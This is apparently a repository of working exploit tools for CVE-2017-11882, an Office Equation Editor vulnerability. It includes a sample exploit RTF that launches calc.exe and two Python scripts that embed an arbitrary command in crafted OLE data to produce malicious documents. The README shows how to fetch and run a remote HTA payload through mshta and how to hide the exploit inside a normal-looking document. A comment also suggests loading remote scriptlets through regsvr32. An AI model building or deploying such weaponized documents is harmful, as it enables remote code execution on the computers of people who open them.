├── README.md
├── example
    └── exploit.rtf
├── Command43b_CVE-2017-11882.py
└── Command109b_CVE-2017-11882.py


/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2017-11882
 2 | 
 3 | 43b 原脚本来自于 https://github.com/embedi/CVE-2017-11882
 4 | 
 5 | 109b 原脚本来自于 https://github.com/unamer/CVE-2017-11882/ （膜一波，现在unamer的代码已经可以执行shellcode了~）
 6 | 
 7 | 
 8 | CVE-2017-11882:
 9 | https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/
10 | 
11 | MITRE CVE-2017-11882:
12 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882
13 | 
14 | Research:
15 | https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about
16 | 
17 | Patch analysis:
18 | https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html
19 | 
20 | DEMO PoC exploitation:
21 | https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410
22 | 
23 | 
24 | ## Usage
25 | 
26 | 
27 | ```python
28 | python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
29 | ```
30 | 
31 | use mshta
32 | ```python
33 | python Command_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc
34 | ```
35 | abc
36 | ```html
37 | <HTML> 
38 | <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
39 | <HEAD> 
40 | <script language="VBScript">
41 | Window.ReSizeTo 0, 0
42 | Window.moveTo -2000,-2000
43 | Set objShell = CreateObject("Wscript.Shell")
44 | objShell.Run "calc.exe"
45 | self.close
46 | </script>
47 | <body>
48 | demo
49 | </body>
50 | </HEAD> 
51 | </HTML> 
52 | 
53 | ```
54 | 
55 | >43b命令长度不能超过43 bytes，109b命令长度不能超过109 bytes
56 | 
57 | # Sample exploit for CVE-2017-11882 (starting calc.exe as payload)
58 | 
59 | `example` folder holds an .rtf file which exploits CVE-2017-11882 vulnerability and runs calculator in the system.
60 | 
61 | ## 关于自定义内容
62 | 
63 | 其实关于自定义内容的姿势也是跟别的师傅学来的，很早之前就已经写成脚本了，本来不打算公开，但是看到小组内已经有人发出来了，没办法，只能公开了，其实方式很简单，只需要文本文件打开正常的文档rtf，复制{\*\datastore 之前的所有内容，替换 {\object\objautlink\objupdate之前的内容即可，所以写到脚本里面就很简单了。
64 | 
65 | 添加自定义内容使用方式,选择任意脚本：
66 | 
67 | ```
68 | python Command109b_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc -i input.rtf
69 | ```
70 | 
71 | 自定义内容在input.rtf中。
72 | 
73 | 
74 | 关于unamer的最新的605字节利用脚本就不更新了，有兴趣自己改。
75 | 
76 | 
77 | 


--------------------------------------------------------------------------------
/example/exploit.rtf:
--------------------------------------------------------------------------------
 1 | {\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
 2 | {\*\generator Riched20 6.3.9600}\viewkind4\uc1
 3 | \pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000000000000000008020cea5613cd30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000201ffffffffffffffffffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006f006d0070004f0062006a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004f0062006a0049006e0066006f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000201ffffffff04000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b2710000000000000000000000000000000000000000000000000000000000000000000000000000000003000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4ee5b0000000000030101030a0a01085a5a636d642e657865202f632063616c632e65786520414141414141414141414141414141414141414141414141120c430000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004500710075006100740069006f006e0020004e00610074006900760065000000000000000000000000000000000000000000000000000000000000000000000020000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000004000000c5000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000d0000004d45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d61746854797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e657720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a600190160a000000313131313131313131310c000000320a6001100f0a000000313131313131313131310c000000320a600190070a000000313131313131313131310c000000320a600110000a000000313131313131313131310a00000026060f000a00ffffffff0100000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff7cef1800040000002d01010004000000f0010000030000000000
 4 | }{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260
 5 | 0100090000039e00000002001c0000000000050000000902000000000500000002010100000005
 6 | 0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002
 7 | 1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000
 8 | 0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000
 9 | 0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000
10 | 002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100
11 | 000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a
12 | 0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300
13 | 00000000
14 | }}}
15 | \par}
16 | 


--------------------------------------------------------------------------------
/Command43b_CVE-2017-11882.py:
--------------------------------------------------------------------------------
  1 | import argparse
  2 | import sys
  3 | 
  4 | 
  5 | RTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
  6 | {\*\generator Riched20 6.3.9600}\viewkind4\uc1
  7 | \pard\sa200\sl276\slmult1\f0\fs22\lang9"""
  8 | 
  9 | 
 10 | RTF_TRAILER = R"""\par}
 11 | """
 12 | 
 13 | 
 14 | OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """
 15 | 
 16 | 
 17 | OBJECT_TRAILER = R"""
 18 | }{\result {\rtlch\fcs1 \af0 \ltrch\fcs0 \dn8\insrsid95542\charrsid95542 {\pict{\*\picprop\shplid1025{\sp{\sn shapeType}{\sv 75}}{\sp{\sn fFlipH}{\sv 0}}
 19 | {\sp{\sn fFlipV}{\sv 0}}{\sp{\sn fLockAspectRatio}{\sv 1}}{\sp{\sn pictureGray}{\sv 0}}{\sp{\sn pictureBiLevel}{\sv 0}}{\sp{\sn fRecolorFillAsPicture}{\sv 0}}{\sp{\sn fUseShapeAnchor}{\sv 0}}{\sp{\sn fFilled}{\sv 0}}{\sp{\sn fHitTestFill}{\sv 1}}
 20 | {\sp{\sn fillShape}{\sv 1}}{\sp{\sn fillUseRect}{\sv 0}}{\sp{\sn fNoFillHitTest}{\sv 0}}{\sp{\sn fLine}{\sv 0}}{\sp{\sn fPreferRelativeResize}{\sv 1}}{\sp{\sn fReallyHidden}{\sv 0}}
 21 | {\sp{\sn fScriptAnchor}{\sv 0}}{\sp{\sn fFakeMaster}{\sv 0}}{\sp{\sn fCameFromImgDummy}{\sv 0}}{\sp{\sn fLayoutInCell}{\sv 1}}}\picscalex100\picscaley100\piccropl0\piccropr0\piccropt0\piccropb0
 22 | \picw353\pich600\picwgoal200\pichgoal340\wmetafile8\bliptag1846300541\blipupi2307{\*\blipuid 6e0c4f7df03da08a8c6c623556e3c652}0100090000035100000000001200000000000500000009020000000005000000020101000000050000000102ffffff00050000002e0118000000050000000b02
 23 | 00000000050000000c02200240011200000026060f001a00ffffffff000010000000c0ffffffaaffffff00010000ca0100000b00000026060f000c004d61746854797065000040000a00000026060f000a00ffffffff010000000000030000000000}}}}
 24 | """
 25 | 
 26 | 
 27 | OBJDATA_TEMPLATE = R"""
 28 | 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1
 29 | b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001
 30 | 0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff
 31 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 32 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 33 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 34 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 35 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 36 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 37 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 38 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 39 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 40 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 41 | fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffe
 42 | fffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 43 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 44 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 45 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 46 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 47 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 48 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 49 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 50 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 51 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 52 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 53 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 54 | ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0074007200790000
 55 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 56 | 00000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000
 57 | 000000000000008020cea5613cd30103000000000200000000000001004f006c0065000000000000
 58 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 59 | 00000000000000000000000a000201ffffffffffffffffffffffff00000000000000000000000000
 60 | 0000000000000000000000000000000000000000000000000000001400000000000000010043006f
 61 | 006d0070004f0062006a000000000000000000000000000000000000000000000000000000000000
 62 | 00000000000000000000000000000000000000120002010100000003000000ffffffff0000000000
 63 | 00000000000000000000000000000000000000000000000000000000000000010000006600000000
 64 | 00000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000
 65 | 00000000000000000000000000000000000000000000000000000012000201ffffffff04000000ff
 66 | ffffff00000000000000000000000000000000000000000000000000000000000000000000000003
 67 | 0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000fe
 68 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 69 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 70 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 71 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 72 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 73 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 74 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 75 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 76 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 77 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 78 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 79 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 80 | ffffff01000002080000000000000000000000000000000000000000000000000000000000000000
 81 | 0000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02
 82 | ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e
 83 | 30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000
 84 | 00000000000000000000000000000000000000000000000000000000000000000000000000030004
 85 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 86 | 000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4
 87 | ee5b0000000000030101030a0a01085a5a4141414141414141414141414141414141414141414141
 88 | 414141414141414141414141414141414141414141120c4300000000000000000000000000000000
 89 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 90 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 91 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 92 | 00000000000000000000000000000000000000000000000000000000000000000000004500710075
 93 | 006100740069006f006e0020004e0061007400690076006500000000000000000000000000000000
 94 | 0000000000000000000000000000000000000020000200ffffffffffffffffffffffff0000000000
 95 | 0000000000000000000000000000000000000000000000000000000000000004000000c500000000
 96 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 97 | 00000000000000000000000000000000000000000000000000000000000000ffffffffffffffffff
 98 | ffffff00000000000000000000000000000000000000000000000000000000000000000000000000
 99 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
100 | 000000000000000000000000000000000000000000000000000000000000000000000000000000ff
101 | ffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000
102 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
103 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
104 | 00000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000000
105 | 00000000000000000000000000000000000000000000000000000001050000050000000d0000004d
106 | 45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500
107 | 000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00
108 | 050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00
109 | ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d617468
110 | 54797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e65
111 | 7720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a6001
112 | 90160a000000313131313131313131310c000000320a6001100f0a00000031313131313131313131
113 | 0c000000320a600190070a000000313131313131313131310c000000320a600110000a0000003131
114 | 31313131313131310a00000026060f000a00ffffffff0100000000001c000000fb02100007000000
115 | 0000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff
116 | 7cef1800040000002d01010004000000f0010000030000000000
117 | """
118 | 
119 | 
120 | COMMAND_OFFSET = 0x949*2
121 | 
122 | 
123 | def create_ole_exec_primitive(command):
124 |     if len(command) > 43:
125 |         print "[!] Primitive command must be shorter than 43 bytes"
126 |         sys.exit(0)
127 |     hex_command = command.encode("hex")
128 |     objdata_hex_stream = OBJDATA_TEMPLATE.translate(None, "\r\n")
129 |     ole_data = objdata_hex_stream[:COMMAND_OFFSET] + hex_command + objdata_hex_stream[COMMAND_OFFSET + len(hex_command):]
130 |     return OBJECT_HEADER + ole_data + OBJECT_TRAILER
131 | 
132 | 
133 | 
134 | def create_rtf(header,command,trailer):
135 |     ole1 = create_ole_exec_primitive(command + " &")
136 |     
137 |     # We need 2 or more commands for executing remote file from WebDAV
138 |     # because WebClient service start may take some time
139 |     return header + ole1 + trailer
140 | 
141 | def getrheader(file):
142 |     input_file = open(file,"r").read()
143 |     r_header = input_file.split("{\*\datastore")[0]
144 |     return r_header
145 | 
146 | if __name__ == '__main__':
147 |     parser = argparse.ArgumentParser(description="PoC for CVE-2017-11882")
148 |     parser.add_argument("-c", "--command", help="Command to execute.", required=True)
149 |     parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
150 |     parser.add_argument("-i", "--input", help="Input normal rtf.", required=False)
151 | 
152 |     args = parser.parse_args()
153 |     if args.input != None:
154 |         r_header = getrheader(args.input)
155 |     else:
156 |         r_header = RTF_HEADER
157 | 
158 |     rtf_content = create_rtf(r_header, args.command ,RTF_TRAILER)
159 |     
160 |     output_file = open(args.output, "w")
161 |     output_file.write(rtf_content)
162 | 
163 |     print "[*] Done ! output file --> " + args.output 


--------------------------------------------------------------------------------
/Command109b_CVE-2017-11882.py:
--------------------------------------------------------------------------------
 1 | # Original poc :https://github.com/embedi/CVE-2017-11882
 2 | # This version accepts a command with 109 bytes long in maximum.
 3 | # Sorry I don't know how to read the struct in objdata, hence I cannot modify the length parameter to aquire a arbitrary length code execution.
 4 | # But that's enough in exploitation. We can use regsvr32 to load sct file remotely.:)
 5 | 
 6 | import argparse
 7 | import sys
 8 | from struct import pack
 9 | 
10 | 
11 | head=r'''{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
12 | {\*\generator Riched20 6.3.9600}\viewkind4\uc1
13 | \pard\sa200\sl276\slmult1\f0\fs22\lang9'''
14 | 
15 | objclass=r'''{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000000000000000008020cea5613cd30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000201ffffffffffffffffffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006f006d0070004f0062006a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004f0062006a0049006e0066006f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000201ffffffff04000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000000000000000000000000000000000000000000000000000000000000000000000000000000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'''
16 | 
17 | 
18 | tail=r'''
19 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000004000000C5000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000D0000004D45544146494C4550494354003421000035FEFFFF9201000008003421CB010000010009000003C500000002001C00000000000500000009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A600190160A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A000000313131313131313131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F0010000030000000000
20 | }{\result {\rtlch\fcs1 \af0 \ltrch\fcs0 \dn8\insrsid95542\charrsid95542 {\pict{\*\picprop\shplid1025{\sp{\sn shapeType}{\sv 75}}{\sp{\sn fFlipH}{\sv 0}}
21 | {\sp{\sn fFlipV}{\sv 0}}{\sp{\sn fLockAspectRatio}{\sv 1}}{\sp{\sn pictureGray}{\sv 0}}{\sp{\sn pictureBiLevel}{\sv 0}}{\sp{\sn fRecolorFillAsPicture}{\sv 0}}{\sp{\sn fUseShapeAnchor}{\sv 0}}{\sp{\sn fFilled}{\sv 0}}{\sp{\sn fHitTestFill}{\sv 1}}
22 | {\sp{\sn fillShape}{\sv 1}}{\sp{\sn fillUseRect}{\sv 0}}{\sp{\sn fNoFillHitTest}{\sv 0}}{\sp{\sn fLine}{\sv 0}}{\sp{\sn fPreferRelativeResize}{\sv 1}}{\sp{\sn fReallyHidden}{\sv 0}}
23 | {\sp{\sn fScriptAnchor}{\sv 0}}{\sp{\sn fFakeMaster}{\sv 0}}{\sp{\sn fCameFromImgDummy}{\sv 0}}{\sp{\sn fLayoutInCell}{\sv 1}}}\picscalex100\picscaley100\piccropl0\piccropr0\piccropt0\piccropb0
24 | \picw353\pich600\picwgoal200\pichgoal340\wmetafile8\bliptag1846300541\blipupi2307{\*\blipuid 6e0c4f7df03da08a8c6c623556e3c652}0100090000035100000000001200000000000500000009020000000005000000020101000000050000000102ffffff00050000002e0118000000050000000b02
25 | 00000000050000000c02200240011200000026060f001a00ffffffff000010000000c0ffffffaaffffff00010000ca0100000b00000026060f000c004d61746854797065000040000a00000026060f000a00ffffffff010000000000030000000000}}}}\par}
26 | '''
